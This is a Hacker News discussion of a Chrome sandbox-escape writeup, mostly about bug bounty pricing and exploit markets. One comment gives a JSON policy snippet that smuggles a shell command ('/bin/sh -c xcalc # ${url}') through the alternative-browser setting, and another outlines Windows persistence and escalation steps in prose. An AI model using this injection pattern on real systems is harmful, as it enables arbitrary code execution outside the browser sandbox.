Escaping the Chrome Sandbox Through DevTools (ading.dev)
407 points by vk6 28 days ago | 77 comments



> You may have noticed that the page URL gets substituted into ${url}, and so to prevent this from messing up the command, we can simply put it behind a # which makes it a comment

Is there some validation logic or something on this policy that the URL must be passed to the "alternative browser" somewhere in the AlternativeBrowserParameters?
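For reference, the sort of policy values I mean, sketched from the quoted trick (illustrative; the exact payload in the writeup may differ). Each `${url}` occurrence in AlternativeBrowserParameters gets the page URL substituted in, so placing it after `#` makes the shell treat it as a comment:

```json
{
  "BrowserSwitcherEnabled": true,
  "AlternativeBrowserPath": "/bin/sh",
  "AlternativeBrowserParameters": ["-c", "xcalc # ${url}"]
}
```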


>I'm Allen, a high school student with an interest in programming, web development, and cybersecurity.

Very impressive!


Oh boy

What an amazing technical talent, sheer persistence, and excellent documentation and communication skills.

Not to mention the work ethic of responsible disclosure.

This person is going places!


Excellent writeup and work. Reading this, I was right there along with you as the excitement built up throughout the discoveries. Thank you!

Well deserved reward!


That's a neat vulnerability chain and a great writeup. Appreciated the breakdown of the vulnerable code as well!

I'm always impressed by the simplicity of tricks like "Press F12 to try again"; it's just so naughty :)


I live in Missouri; I pressed F12 once and the governor tried to get me arrested.



Reminds me of when I used this same API to debug Chrome OS's "crosh" shell and escape OS protections, also obtaining root access on developer devices. (CVE-2014-3172)

The author of this post had to bypass much more challenging obstacles. This is great work!


Oof. Too late in my night to dive into the guts of what's broken in WebUI validation, but good on this person for persisting and figuring it out. It's pretty standard to question and distrust toolchains in the things we deploy, but at the same time we put way too much trust in magically convenient dev tools from large companies like Google or MS. Mostly because we want to get on with writing and testing our own code, not worry about whatever the fuck is lurking in Chromium or VSCode.


God damn that is one of the best things I’ve ever read.

Super clever sleuthing


Thanks for the writeup, very interesting and detailed! And the effort of digging through the browser code to find all this is fantastic!


Wow, wow and wow for a high school student.


Chromium project decides to remove chrome://net-internals because the page is too complex

... and adds chrome://policy with half-baked JSON edit support.


really sick writeup, felt like a thriller novel


Awesome vuln chain.


Given the severity, I can't help but feel that this is underpaid at the scale Google operates at. Chrome is so ubiquitous that vulnerabilities like these could hit hard. The last thing they need is to send the signal that it's better to sell these on the black market.


I hate that every time a vulnerability is posted, someone has to argue about whether the bounty is high enough. It’s always followed by, "blah blah, they're pushing whitehats to sell it on the black market."

Vulnerabilities will always sell for more on the black market because there’s an added cost for asking people to do immoral and likely illegal things. Comparing the two is meaningless.

To give a straightforward answer: no, I don’t think $20k is underpaid. The severity of a bug isn't based on how it could theoretically affect people but on how it actually does. There's no evidence this is even in the wild, and based on the description, it seems complicated to exploit for attacks.


> The severity of a bug isn't based on how it could theoretically affect people but on how it actually does

No, it's priced on demand and supply like anything else; bug bounties are priced to be the amount that Google thinks it takes to incentivise hunters to sell it to them, vs. to black hats.


I know not everyone shares my world-view, but I need to be literally starving to consider selling whatever I discover to a criminal.

principles > wild market


> principles > wild market

Your principles will be gone by the time the 10th company starts to sue you for a public disclosure you did in good faith.

There's a reason why nobody wants to use their real name and creates new aliases for every single CVE and report.

Principles that conflict with the law effectively don't exist. If the law dictates a different principle than your own, guess what: you'll be the one in jail.

Whistleblower protection laws are a bad joke, and politicians have no (financial) incentives to change that.


Not going to name names, but someone I know was happy when his workplace was acquired by a bigger company from another country. He was the most senior developer, had done the heavy lifting, the product did a good job for its happy users and the buyer would continue that, and last but not least, he'd be rich. Admittedly, part of the agreement was a handshake; there had been so much to do, they'd worked insane amounts of overtime, and some paperwork had been deferred…

He got nothing. No money at all. The CEO pretended to have forgotten every verbal agreement.

You only need to experience that kind of thing once to change your mind.


To change your mind about making sure everything is in writing in a binding contract?


I'd guess most people would react in one of three ways, including that one. I can understand all three.


I think many people have internalised a purely profit-driven world view, and it is what they expect to be the main motivator of themselves and others.


TL;DR: a random stranger is most likely a nice and honest and principled human being. A sufficiently large population of random strangers behaves approximately like a population of amoral(ish), rational(ish) economic actors. If your process involves continuously drawing a stranger at random from a population, then you can't avoid taking the economic view, because you eventually will draw a crazy or malevolent or economically-rational stranger.

--

GP wouldn't sell their discoveries to the criminals. But would they consider selling them to a third party as an intermediary, perhaps one that looks very much above board, and specializes in getting rewards from bug bounties in exchange for a percentage of payout?

I don't know if such companies exist, but I suspect they might - they exist for approximately everything else, it's a natural consequence of specialization and free markets.

Say GP would say yes; how much work would they put into vetting that the third party doesn't double-dip by also selling the exploit on the black market? How can they be sure? Maybe there is a principled company out there, but we all know principled actors self-select out of the market over time.

Or, maybe GP wouldn't sell them unless starving, but what if agents of their government come and politely ask them to share, for the Good of their Country/People/Flag/Queen/Uniform/whatever?

Or, maybe GP wouldn't sell them unless starving, but what is their threshold of "starving"? For many, that wouldn't be literally starving, but some point on a spectrum between that and moderate quality-of-life drop. Like, idk, potentially losing their home, or (more US-specific I guess) random event leaving them with a stupidly high medical bill to pay, etc.

With all that in mind, the main question is: how do you know? How does Google know?

The reason people take an economic view of the world is because it's the only tool that lets you do useful analysis - but unlike with the proverbial hammer that makes everything look like a nail, at large enough scale, approximately everything behaves like a nail. Plus, most of the time, it only takes one.

GP may be principled, but there's likely[0] more than one person making the same discovery at the same time, and some of those people may not be as principled as GP. You can't rely on only ever dealing with principled people - like with a game of Russian roulette, if you pull the trigger enough times, you'll have a bad day.

--

[0] - Arguably, always. Real breakthrough leaps almost never happen, discoveries are usually very incremental - when all the pieces are there, many people end up noticing it and working on the next increment in parallel. The first one to publish is usually the only one to get the credit, though.


But you probably wouldn't take the time to write up a nice report and send it to Google either if they didn't pay. Or even try to find the bug in the first place.

(But yea, I think lots of people would sell exploits to criminals for enough money.)


Yeah I think this is the part that never gets mentioned. I'd like to think that most people wouldn't immediately go to selling on the black market, even if the pay is better it's just too risky if you get caught.

But if you don't pay people enough in the first place... then they're just going to spend their time doing other things that actually do pay and your bugs won't get caught except by those who are specifically trying to target you for illicit purposes.


Not worth it. Because now you are in the underbelly.


I mean the alternative isn't that you are selling it on the black market, it's that you expose the issue in a blog post and the first time Google knows is when one of their employees sees the post here on Hacker News.

You are essentially being paid to fill out forms and keep your mouth shut.


This assumes efficient markets, which don't exist when there is a monopoly on legitimate buyers. The value any one individual puts on a thing does not a market make.


Is it really a monopoly though, if there are multiple companies offering bug bounties? If the whitehat feels he is underpaid, he could just go look for bugs in another product.


The market or lack thereof is for a product. That researchers can work on a different product is a market for labor.


There's a clear cut between selling it to Google and selling it to black hats. White hats mostly have a career in cyber security and they will not disclose a vulnerability to a compromised party regardless of the price. Cyber security researchers will like having their name attached to a CVE or a fix in a well known open source project which is arguably worth more than 20K to them. If someone finds out you sold a vulnerability, or exploit, to a hostile party, your career is over.


Yea, comparing the legitimate with the illegitimate market is a weird kind of calculation, as the risk with the illegitimate market is ending up in jail, and few people want to calculate the monetary value of time lost to incarceration and all the fallout that comes with it.

The more interesting question would be, if the bug bounty is enough to keep legitimate researchers engaged to investigate and document the threats. But..

The bug bounty itself is only a drop in the bucket for security companies, as it's (a) unsteady and (b) not enough to cover even trivial research-environment costs.

Practically, it's a nice monetary and reputational bonus (for having the name associated with the detection) on top of the regular business of providing baseline security intelligence, solutions, and services to enterprises, which is what earns the regular paycheck.

Living off quests and bounties is more the realm of fantasy.


Is it actually illegal to sell an exploit to the highest bidder? Obviously deploying or using the exploit violates any number of laws.

From a speech perspective, if I discovered an exploit and wrote a paper explaining it, what law prevents me from selling that research?


(I'm not a lawyer but) I think that would involve you in the conspiracy to commit the cybercrime, if you developed the exploit and sold it to an entity that used it with wrongful intent.

https://www.law.cornell.edu/uscode/text/18/1029 gives the definition and penalties for committing fraud and/or unauthorized access, and it includes the development of such tools.

A lot of it includes the phrasing "with intent to defraud" so it may depend on whether the court can show you knew your highest bidder was going to use it in this way.

(apologies for citing US-centric law, I figured it was most relevant to the current discussion but things may vary by jurisdiction, though probably not by much)


You only risk prison if you sell it to the "bad guys" on the black market. Sell it to people who can jail the bad guys instead; that is, our governments.


I actually don't believe so.

Not everything is priced on demand and supply -- at least not strictly.

Of course the potential for abuse is part of the equation, but I think Google (or similar large companies) simply has a guideline for how the amount of the bounty is decided, rather than surveying the market to see what its "actual value" is. It's not exactly a free market, at least not on Google's side.


I assure you that when Google set those bounties, they thought about how much they would have to pay white hats to make them do the right thing. Of course, it's a highly illiquid market (usually there's just one seller and only a handful of buyers), and so the pricing is super inefficient (hence based on guidelines and not surveying on every individual bug), but the logic remains.


> it's priced on demand and supply like anything else

You should complete the sentence: “It’s priced based on demand and supply in legal markets like anything else.”

There are, of course, other markets where things like this are traded, but that’s a different story. That said, I think the author is free to negotiate further with Google if they believe it’s worth it.


I suspect the potentially wider addressable market on the black market has more to do with the price-setting mechanism than an immorality premium does.

Although, maybe there is something to the immorality/illegality tax in this case. The author is in high school (how cool is that!?) and the article would probably hit differently to prospective employers if it were detailing the exploit they had sold to NK (which is to say nothing of how NK would feel about the sunlight).


I've made lots of money with bug bounties over the years and mostly stopped this year in favor of private consulting. Companies will try anything to get out of paying, even through the major platforms.

I once found a bug where I could access all of the names, addresses, emails, and phone numbers of all users for a new contest this company was running. I even found public announcements on Twitter. They told me this was a staging environment and wouldn't pay me. It clearly wasn't, as the URLs were linked directly from the announcement.

Another time, a company had an application that allowed other companies to run internal corporate training. I was able to get access to all accounts, information, and private rooms of all the Fortune 500 companies using it. They initially tried to get out of it by telling me they didn't own the application anymore (and immediately removed it from scope). I had proof it was in scope at the time I found the bugs (and had even confirmed it beforehand with the platform).

Luckily, the platform I went through fought this and I got my payout...6 months later.

Even now, I have 50+ bugs that were triaged over the past year, and the companies just sit on them and won't respond or pay out. Major platforms like HackerOne and Bugcrowd don't seem to protect their researchers at all.


If they make excuses, sit on it, or don't pay out, release those bugs into the public domain; that's how this system works!


While I would love to do that, I still enjoy making a living in security.


I'm genuinely interested here. If you made some security bugs public because the company wasn't cooperating properly, would that damage your reputation in the community to the point of jeopardising your career opportunities?

From the outside looking in, it seems the community would applaud that behavior, but I'm not familiar.


> sell these on the black market.

How? I always see this mentioned, but it seems impractical to me. I've discovered bugs which have paid out a few thousand dollars - big corporates have well-publicised schemes, but I've no idea how I would go about selling one to a criminal.

Even if I did know where to find them - how would I trust them? Can I tell they're not really the police doing a sting?

If they paid me, how would I explain my new wealth to the tax authorities?

Once the criminal knows they've paid me, what's to stop them blackmailing me? Or otherwise threatening me?

Oh, and I won't be able to publish a kudos-raising blog post about it.

How much would a criminal have to pay me to take on that level of risk?

Should Google pay out more for this? Probably. Is the average security researcher really going to take the risk of dealing with criminals in the hope that they pay a bit more? Unlikely.


> How?

Huh... The first result in Google for "selling exploits" shows it's not only criminals who are buying exploits:

https://zerodium.com/program.html

(up to $500K for Chrome RCE, but probably not for this, since it requires an extension install)

Another result is the Wikipedia article, which also talks about these gray markets:

"Gray markets buyers include clients from the private sector, governments and brokers who resell vulnerabilities."


Zerodium sells to government intelligence agencies, so I guess it depends on your definition of “criminals.”


Sell it to governments. Biggest good guys bad guys.


I think maintaining anonymity is the key. Ensuring you get paid is the next thing. I'm not sure how you can achieve this in practice.


If you can trick someone into installing a malicious extension with arbitrary permissions, you can already run arbitrary code on every webpage they visit, including their logged in bank, social media, etc.

You think an attacker is right now thinking "Man, I know exactly how to make a lot of victims install an extension, but I can only steal their coinbase wallet and bank accounts, if only there was a way I could run calc.exe on their machine too..." who's going to pay more than $20k to upgrade from "steal all their money" to "steal all their money and run calc.exe"?


No, "calc.exe upgrade" is definitely worth more than $20k to criminals, as it's a huge qualitative jump in capabilities. A full-privileged browser extension can only mess with things you actively visit in your browser. But give it "calc.exe privileges", and it now can mess with anything that touches your computer, with or without your involvement. Private keys on your hard drive, photos on your phone that you plugged in via USB to transfer something, IoT devices on your LAN - all are fair game. And so many, many other things.


Correct me if I’m wrong, but remote code execution has the advantage of being able to access information without the user being involved at all. Sure the user needs to install and trigger the exploit, but whatever code the attacker runs doesn’t require the user to interact with certain urls. If you can launch arbitrary programs, you can probably install all sorts of nasty things that are potentially more lucrative than the victim’s bank or coinbase accounts.


It breaks the assumption that Chrome is sandboxed and that something I do as a user, including installing an extension, will not have an impact outside of Chrome. A new process outside Chrome to call your own and do whatever you want with.

You're on Windows? Download a binary, create some WMI triggers, and get executed at every boot as the same user (no elevation required for the same user; if Admin, you can get NT AUTHORITY\SYSTEM). If you find something to elevate to Administrator, you could also patch the beginning of some rarely used syscall, then invoke it and get a thread to yourself in the kernel. These things tend to almost chain themselves sometimes. At least on Windows it feels that way.

Also the user doesn't have to navigate to a specific URL in the final form, just needs to open devtools after installing the extension.


I actually think escaping the browser is a huge leap and frequently a primary goal for a black hat, e.g. someone trying to install ransomware, or a spy targeting a specific person or org.

From outside the browser they can exploit kernel bugs to elevate their privilege; and they can probe the network to attempt to move laterally in the org.

So while I think your comment is thoughtful, its thoughtfulness made me think of agreeing with the opposite :-)


That's not entirely true: if you look at the manifest in the GitHub repo, you can see that it only requires the `tabs` permission, which makes the extension seem quite safe when installed, since it should not have access to the content of your pages.
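For illustration, a minimal manifest along those lines might look like this (a sketch, not the repo's actual file; the `devtools_page` entry is my assumption based on the exploit requiring the victim to open DevTools):

```json
{
  "manifest_version": 3,
  "name": "example-extension",
  "version": "1.0",
  "permissions": ["tabs"],
  "devtools_page": "devtools.html"
}
```

Note there are no `host_permissions` and no content scripts, which is why the install prompt looks so innocuous.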


"Run calc.exe" actually means stealing money from everybody in their entire organization, or blackmailing the entire organization by encrypting all the data they need to function.


If compromising a single machine of a user already compromises your entire orgs IT, you’re doing something wrong, right? Shouldn’t a normal user lack privileges to do this much damage to the network?


Everybody is doing something wrong.


they say: `This also means that, unfortunately, the bug will not work on stable builds of Google Chrome since the release channel is set to the proper value there`

So it only works on Chromium, a much smaller attack surface than the entire Chrome user base.


Slight correction: it worked on Chromium and on Google Chrome canary.


"what percentage of grandmas would lose their life savings if they stumble across this bug" is the metric I use to determine severity.

And in this case, it requires a chain of unlikely events: the user tricked into installing an extension (probably not one from the store, which is now particularly hard on Windows), then tricked into opening devtools.

It's gonna be sub-1%. Certainly still worth fixing, but nowhere near as bad as a universal XSS bug.


Not only that, but it doesn't work on Google Chrome releases, only the (upstream) Chromium, and Google Chrome canary. Very few people use raw Chromium all by its lonesome and I would guess only for testing/development, not downloading random extensions.


I use Chromium, because I'm on Ubuntu. (Admittedly, I don't use it very often. I tend to be loyal to Firefox most of the time.)


If it had worked for Chrome it should (and maybe would) have been a lot higher. Also: doesn't it use an extension?

I was under the impression that extensions were un-sandboxed and basically just executables I trust to run with the same privilege as the browser itself (which is a lot, at least under windows).


No, extensions live inside the browser sandbox and have to specify their permissions up front. They can request fairly wide permissions within the browser, yes, but they have to explicitly list the permissions they require in the manifest, and the browser will ask if you're fine with those before installing. Outside of the browser itself, extensions can't do much of anything beyond sending messages to applications that explicitly register to receive them.


Chrome needs to be rewritten in Rust asap


No it doesn't? This has nothing to do with memory safety. It's a logic error, which Rust physically cannot prevent.


This had nothing to do with Chrome, but rather Chromium.

>Considering that I'm using plain Chromium and not the branded Google Chrome, the channel will always be Channel::UNKNOWN. This also means that, unfortunately, the bug will not work on stable builds of Google Chrome since the release channel is set to the proper value there.


Malware can be written in Rust too; what difference would it make? Also, it's not a memory-safety vulnerability but a policy-logic vulnerability.


But at least the vulnerability would be blazingly fast


Did you even read the post?


Is it bad for Chrome to have vulnerabilities? Long-term, I think it's really good. People need to get away from the browser monopoly (because it really is only Chrome holding the power here) and support the ecosystem.


> Is it bad for Chrome to have vulnerabilities?

Yes, obviously it is. Is it bad for others/the public? Probably, but not as bad as it is for Chrome.

> because it really is only Chrome here holding the power

I'm not sure this is true. Apple pretty much forces usage of their browser engine on iOS, and heavily tries to get people to use Safari on macOS. Microsoft pushes Edge pretty hard on Windows, and its browser engine is so intertwined with the OS that you can't not use it. Both of them say they let you change the default, but various links in the OS still open Edge/Safari even if you have changed the default browser. Not sure if that's on purpose or not.


> and heavily try to get people to use Safari on macOS

How so? On any new macOS install, I use Safari to download Firefox. After that, I never think about Safari until I'm trying to use its DevTools to look at iDevices. I never get a nag screen about Safari, and I have never had the default browser changed after an update.

So where exactly is this heavy-handed attempt at forcing Safari down anyone's throat?


I'm not on a macOS machine right now, so can't show you any specific examples, but scattered links/actions across Apple applications still open Safari from time to time (I think Xcode was especially gnarly for a long time), as it seems at one point Apple hardwired the links/actions to open Safari rather than the user set browser. Search for `site:discussions.apple.com wrong browser` in your favorite search engine and you'll get some actual examples.


Back when I used to run Chrome, I noticed one case that would do this (it was buried in Spotlight), but it didn't seem intentional (especially because web search results in Spotlight always respected the default browser setting, and showed the correct browser icon as well). I use Safari now though, so I won't be finding any more cases like that anytime soon.



